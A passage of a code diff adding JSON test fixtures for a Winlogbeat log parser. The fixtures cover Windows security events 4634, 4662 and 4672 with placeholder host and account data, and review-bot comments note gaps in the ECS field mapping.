Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:42:47.895000Z",
+ "action": {
+ "id": 4634,
+ "outcome": "success",
+ "properties": {
+ "LogonType": "3",
+ "TargetDomainName": "J_DOE",
+ "TargetLogonId": "0x5ed35bb6",
+ "TargetUserName": "ACCOUNT",
+ "TargetUserSid": "S-1-2-3"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ],
+ "user": [
+ "ACCOUNT"
+ ]
+ },
+ "user": {
+ "domain": "J_DOE",
+ "id": "S-1-2-3",
+ "name": "ACCOUNT",
+ "target": {
+ "domain": "J_DOE",
+ "name": "ACCOUNT"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.jdoe.com",
+ "event_id": "4634",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x5ed35bb6",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 704,
+ "thread": {
+ "id": 6336
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "15983780774",
+ "task": "Logoff"
+ }
+ }
+}
\ No newline at end of file
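Review bot: `event.action` is pinned as the raw `"Logoff"` with no `event.category` or `event.type`, whereas the 4624 and 4625 fixtures in this same patch normalise logons to `authentication_network` with `"category": ["authentication"]` and `"type": ["start"]`; the logoff counterpart would be `"type": ["end"]` (and, if the 4624 action is indeed derived from LogonType 3, the same `authentication_network` action), which lets session start/end pairing on `winlog.logon.id` work from ECS fields alone. If the asymmetry is deliberate, a short note in the parser would help; otherwise this expected block locks in the gap. The `user` block mapping the subject SID `S-1-2-3` to both `user.id` and `user.target.*` for `ACCOUNT` is right for 4634, where the logged-off account is the subject, and is consistent with the `related.user` entry.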
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json
new file mode 100644
index 000000000..3d80320f5
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4662.json
@@ -0,0 +1,105 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject 
Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType 
d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + 
"SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..59c3d35b3 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json 
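Review bot: The expected block of this 4662 fixture has no `user` object and no `related.user` entry, even though the input's `event_data` carries `SubjectUserName` "ACCOUNT01$" and `SubjectUserSid` "S-1-2-3", and the 4672 and 4689 fixtures added in this same commit map those same fields to `user.name`, `user.id` and `related.user`. If this mirrors what the parser produces rather than a deliberate choice, the fixture pins the loss of the acting principal on a Directory Service Access event, which is the field a detection for sensitive-attribute reads would pivot on. Either align the expected output with the 4672 shape (a `"user": {"domain": "DOMAIN", "id": "S-1-2-3", "name": "ACCOUNT01"}` object plus the matching `related.user`) once the parser emits it, or state in the PR description why 4662 is intentionally excluded. All the new fixtures in this commit also lack a trailing newline (`\ No newline at end of file`), which a formatter pass would fix.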
@@ -0,0 +1,82 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": 